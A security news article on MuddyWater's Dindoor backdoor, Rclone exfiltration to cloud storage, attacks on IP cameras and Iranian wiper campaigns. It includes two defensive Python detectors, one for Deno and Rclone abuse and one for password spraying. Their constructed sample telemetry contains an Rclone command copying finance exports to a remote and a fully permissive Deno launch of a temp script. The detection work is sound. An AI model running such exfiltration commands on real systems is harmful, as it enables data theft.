Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor

Security Reporter

Iranian state-sponsored group MuddyWater has infiltrated U.S. companies using a new backdoor, Dindoor, and is targeting critical infrastructure amid the escalating Middle East conflict.

New research from Broadcom's Symantec and Carbon Black Threat Hunter Team has uncovered a sophisticated cyber espionage campaign by Iranian state-sponsored hackers targeting U.S. networks. The activity, attributed to the MuddyWater group (also known as Seedworm), represents a significant escalation in Iran's cyber operations amid the ongoing military conflict in the Middle East.


The campaign, which began in early February 2026, has seen Iranian hackers embed themselves within the networks of multiple U.S. companies, including banks, airports, non-profit organizations, and the Israeli arm of a software company. According to the security researchers, the software company targeted supplies the defense and aerospace industries and has operations in Israel, making it a strategic target for Iranian intelligence gathering.

New Dindoor Backdoor Leverages Modern Technologies

The attackers deployed a previously unknown backdoor dubbed "Dindoor" that leverages the Deno JavaScript runtime for execution. This represents a notable shift in Iranian hacking tactics, as the group moves toward more modern development frameworks and cloud-native technologies. The use of Deno suggests the attackers are evolving their toolset to blend in with legitimate development environments and evade traditional detection methods.

In addition to Dindoor, the researchers discovered attempts to exfiltrate data using the Rclone utility to a Wasabi cloud storage bucket. While it remains unclear whether this data theft was successful, the use of legitimate cloud storage services for exfiltration demonstrates the attackers' sophisticated approach to avoiding detection.
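The two behaviours described above, a JavaScript runtime launched where no developer would launch it and a legitimate sync tool pushing data to a remote, are both visible in ordinary process-creation telemetry. The following is an added example written for this article, not code from the Symantec/Carbon Black report and not derived from any Dindoor sample: a small hunt over Sysmon/EDR-style process events that flags Deno launches with suspicious characteristics (binary outside the expected install path, spawned by a script host or Office process, broad `-A`/`--allow-all`/`--allow-run` permissions, or a script fetched over HTTP) and any Rclone `copy`/`sync`/`move` whose destination is a named remote. The JSON events, hostnames, user names, file paths, the remote name `stor1` and the list of "expected" Deno install directories are all constructed assumptions to be tuned to your own estate.

```python
"""Hunt process-creation telemetry for Deno runtime abuse and Rclone transfers
to a remote. Added example for this article; the events below are constructed
to resemble Sysmon/EDR process-creation records and are not real artefacts."""
import json
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional

# Constructed sample telemetry (JSON lines). Backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"host":"ws-17","user":"jdoe","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Program Files\\deno\\deno.exe","cmd":"deno run --allow-net C:\\dev\\app\\server.ts"}
{"host":"ws-42","user":"asmith","parent":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Users\\asmith\\AppData\\Local\\Temp\\deno.exe","cmd":"deno.exe run -A --no-prompt C:\\Users\\asmith\\AppData\\Local\\Temp\\update.js"}
{"host":"fs-01","user":"svc_backup","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\ProgramData\\rc\\rclone.exe","cmd":"rclone copy D:\\Finance\\Exports stor1:corp-archive --config C:\\ProgramData\\rc\\rclone.conf"}
{"host":"ws-17","user":"jdoe","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmd":"notepad.exe notes.txt"}
"""

# Assumed locations where a sanctioned Deno install would live; tune per estate.
EXPECTED_DENO_DIRS = ("\\program files\\deno\\", "\\.deno\\bin\\", "\\scoop\\apps\\deno\\")
# Parents that should not normally be launching a JavaScript runtime.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe",
                       "excel.exe", "outlook.exe", "powershell.exe"}
BROAD_PERMS = re.compile(r"(?<!\S)(-A|--allow-all|--allow-run)(?!\S)")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
RCLONE_TRANSFER = re.compile(r"(?<!\S)(copy|copyto|sync|move|moveto)(?!\S)", re.IGNORECASE)
# A named rclone remote looks like 'name:path'; a bare drive letter ('D:') is excluded
# because the name must be at least two characters.
RCLONE_REMOTE = re.compile(r"(?<!\S)([A-Za-z][A-Za-z0-9_.-]+):(\S*)")


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> Iterator[dict]:
    """Yield one dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def check_deno(ev: dict) -> Optional[Finding]:
    """Flag Deno launches that do not look like developer activity."""
    if basename(ev["image"]) not in ("deno.exe", "deno"):
        return None
    reasons = []
    if not any(d in ev["image"].lower() for d in EXPECTED_DENO_DIRS):
        reasons.append("binary outside expected install paths")
    parent = basename(ev["parent"])
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append(f"spawned by {parent}")
    if BROAD_PERMS.search(ev["cmd"]):
        reasons.append("broad permission flags")
    if REMOTE_URL.search(ev["cmd"]):
        reasons.append("script loaded from a remote URL")
    if not reasons:
        return None
    return Finding(ev["host"], "deno_runtime_abuse", "; ".join(reasons))


def check_rclone(ev: dict) -> Optional[Finding]:
    """Flag rclone transfers whose destination is a configured remote."""
    if basename(ev["image"]) != "rclone.exe":
        return None
    cmd = ev["cmd"]
    if not RCLONE_TRANSFER.search(cmd):
        return None
    remote = RCLONE_REMOTE.search(cmd)
    if not remote:
        return None
    return Finding(ev["host"], "rclone_remote_transfer",
                   f"{ev['user']} transferred data to remote '{remote.group(1)}' via rclone")


def hunt(text: str) -> List[Finding]:
    """Run every check over every event and collect the findings in order."""
    findings: List[Finding] = []
    for ev in parse_events(text):
        for check in (check_deno, check_rclone):
            found = check(ev)
            if found:
                findings.append(found)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The Rclone rule deliberately keys on the presence of a named remote rather than on the word "wasabi" or "backblaze" in the command line: the provider lives in `rclone.conf`, so the command itself rarely names it. Pair this with review of any `rclone.conf` found on a host and with egress logs for S3-compatible endpoints.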

Multiple Attack Vectors and Malware Families

The campaign employed various malware families across different targets. At a U.S. airport and a non-profit organization, researchers found a separate Python backdoor called "Fakeset," which was downloaded from servers belonging to Backblaze, an American cloud storage and data backup company. The digital certificate used to sign Fakeset has also been used to sign Stagecomp and Darkcomp malware, both previously linked to MuddyWater operations.

"While this malware wasn't seen on the targeted networks, the use of the same certificates suggests the same actor -- namely Seedworm -- was behind the activity on the networks of the U.S. companies," Symantec and Carbon Black researchers stated in their report.

Escalating Iranian Cyber Operations

The timing of these attacks coincides with recent U.S. and Israeli military strikes on Iran, suggesting a direct retaliatory cyber response. The findings emerge against a backdrop of escalating military conflict, with Iranian cyber operations intensifying across multiple fronts.

Recent research from Check Point has uncovered the pro-Palestinian hacktivist group Handala Hack (also known as Void Manticore) routing operations through Starlink IP ranges to probe externally facing applications for misconfigurations and weak credentials. This demonstrates how Iranian-aligned groups are adapting their infrastructure to evade detection.

Camera Compromise as Strategic Intelligence Tool

Multiple Iran-nexus adversaries, including groups like Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerable Hikvision cameras and video intercom solutions using known security flaws such as CVE-2017-7921 and CVE-2023-6895. The targeting has intensified in the wake of the current Middle East conflict.

Check Point researchers report that exploitation attempts against IP cameras have surged in Israel and Gulf countries, including the UAE, Qatar, Bahrain, and Kuwait, along with Lebanon and Cyprus. The activity has singled out cameras from Dahua and Hikvision, weaponizing vulnerabilities including CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.

"Taken together, these findings are consistent with the assessment that Iran, as part of its doctrine, leverages camera compromise for operational support and ongoing battle damage assessment (BDA) for missile operations, potentially in some cases prior to missile launches," Check Point stated. "As a result, tracking camera-targeting activity from specific, attributed infrastructures may serve as an early indicator of potential follow-on kinetic activity."

Broader Iranian Cyber Campaign

The U.S.-Israel conflict with Iran has prompted multiple cyber operations across various sectors. The Canadian Centre for Cyber Security (CCCS) has issued advisories warning that Iran will likely use its cyber apparatus to stage retaliatory attacks against critical infrastructure and conduct information operations to further the regime's interests.

Recent developments include:

  • Israeli intelligence agencies reportedly hacked into Tehran's extensive traffic camera network for years to monitor the movements of bodyguards of Ayatollah Ali Khamenei and other top Iranian officials
  • Iran's Islamic Revolutionary Guard Corps (IRGC) targeted Amazon's data center in Bahrain for the company's support of "enemy's military and intelligence activities"
  • Active wiper campaigns are underway against Israeli energy, financial, government, and utilities sectors

Anomali reports that Iran's wiper arsenal includes over 15 families, including ZeroCleare, Meteor, Dustman, DEADWOOD, Apostle, BFG Agonizer, MultiLayer, and PartialWasher.

Sophisticated and Maturing Threat Actor

LevelBlue analysts note that Iranian state-sponsored APT groups like MuddyWater, Charming Kitten, OilRig, Elfin, and Fox Kitten "demonstrated clear signs of activation and rapid retooling, positioning themselves for retaliatory operations amid the escalating conflict."

UltraViolet Cyber emphasizes that "Iran's offensive cyber capability has matured into a durable instrument of state power used to support intelligence collection, regional influence, and strategic signaling during periods of geopolitical tension."

A defining feature of Iran's current cyber doctrine is its emphasis on identity and cloud control planes as the primary attack surface. Rather than prioritizing zero-day exploitation or highly novel malware at scale, Iranian operators tend to focus on repeatable access techniques such as credential theft, password spraying, and social engineering, followed by persistence through widely deployed enterprise services.
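Password spraying, named above as one of the repeatable access techniques these operators favour, has a distinctive shape in authentication logs: many distinct accounts tried from one source, each only once or twice, so per-account lockout thresholds are never reached. The following is an added example, not part of the article or of any vendor report cited in it: a detector that looks for that breadth-over-depth signature in a sliding window and reports any account that subsequently authenticated successfully from the same source. The log format (`timestamp source_ip user RESULT`), the IP addresses (taken from the documentation ranges), the user names and the thresholds are all constructed assumptions.

```python
"""Detect password-spraying patterns in authentication logs.
Added example for this article; the log lines are constructed and use
documentation IP ranges, not data from any real tenant."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample log: one source tries eight accounts once each within
# three minutes and then succeeds as 'hank'; a second source is one user
# mistyping a password; a third is a single failure.
SAMPLE_LOG = """\
2026-02-03T08:00:01Z 203.0.113.7 alice FAILURE
2026-02-03T08:00:19Z 203.0.113.7 bob FAILURE
2026-02-03T08:00:37Z 203.0.113.7 carol FAILURE
2026-02-03T08:00:55Z 203.0.113.7 dave FAILURE
2026-02-03T08:01:13Z 203.0.113.7 erin FAILURE
2026-02-03T08:01:31Z 203.0.113.7 frank FAILURE
2026-02-03T08:01:49Z 203.0.113.7 grace FAILURE
2026-02-03T08:02:07Z 203.0.113.7 hank FAILURE
2026-02-03T08:03:10Z 203.0.113.7 hank SUCCESS
2026-02-03T08:10:00Z 198.51.100.9 alice FAILURE
2026-02-03T08:10:20Z 198.51.100.9 alice FAILURE
2026-02-03T08:10:45Z 198.51.100.9 alice FAILURE
2026-02-03T08:11:00Z 198.51.100.9 alice SUCCESS
2026-02-03T08:12:30Z 192.0.2.5 bob FAILURE
"""


@dataclass
class AuthEvent:
    ts: datetime
    src_ip: str
    user: str
    result: str


@dataclass
class SprayAlert:
    src_ip: str
    window_start: datetime
    distinct_users: int
    attempts: int
    compromised: List[str]  # accounts that later succeeded from the same source


def parse_log(text: str) -> List[AuthEvent]:
    """Parse 'timestamp ip user RESULT' lines (constructed format)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append(AuthEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result))
    return events


def detect_spray(events: List[AuthEvent], window: timedelta = timedelta(minutes=10),
                 min_users: int = 5, max_per_user: int = 2) -> List[SprayAlert]:
    """One alert per source and window in which failures span at least
    `min_users` distinct accounts with no account tried more than
    `max_per_user` times (breadth over depth)."""
    by_ip: Dict[str, List[AuthEvent]] = defaultdict(list)
    for e in events:
        by_ip[e.src_ip].append(e)
    alerts: List[SprayAlert] = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        fails = [e for e in evs if e.result == "FAILURE"]
        i = 0
        while i < len(fails):
            start = fails[i].ts
            end = start + window
            window_fails = [f for f in fails[i:] if f.ts < end]
            per_user = Counter(f.user for f in window_fails)
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                compromised = sorted({e.user for e in evs
                                      if e.result == "SUCCESS" and start <= e.ts < end
                                      and e.user in per_user})
                alerts.append(SprayAlert(ip, start, len(per_user), len(window_fails), compromised))
                i += len(window_fails)  # do not re-alert on the same window
            else:
                i += 1
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_log(SAMPLE_LOG)):
        print(f"spray from {a.src_ip} at {a.window_start:%H:%M}: "
              f"{a.distinct_users} accounts, {a.attempts} attempts, "
              f"compromised={a.compromised or 'none'}")
```

The `max_per_user` bound is what separates a spray from a brute force against one account; the second source in the sample (three failures then a success for a single user) is the everyday mistyped-password pattern and correctly produces no alert. In a real tenant the grouping key would usually be the source ASN or a client fingerprint rather than a single IP, since sprayers rotate addresses.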

Recommended Security Measures

Organizations are advised to bolster their cybersecurity posture through several key measures:

  • Strengthen monitoring capabilities to detect anomalous network activity
  • Limit exposure to the internet and implement comprehensive network segmentation
  • Disable remote access to operational technology (OT) systems where possible
  • Enforce phishing-resistant multi-factor authentication (MFA)
  • Maintain offline backups to protect against wiper attacks
  • Ensure all internet-facing applications, VPN gateways, and edge devices are up-to-date

CrowdStrike's Adam Meyers warns that "Western organizations should continue to remain on high-alert for potential cyber response as the conflict continues and activity may move beyond hacktivism and into destructive operations."

The sophistication and scale of these Iranian cyber operations demonstrate how state-sponsored hacking has become an integral component of modern geopolitical conflict, with critical infrastructure and corporate networks serving as battlegrounds in the digital domain.
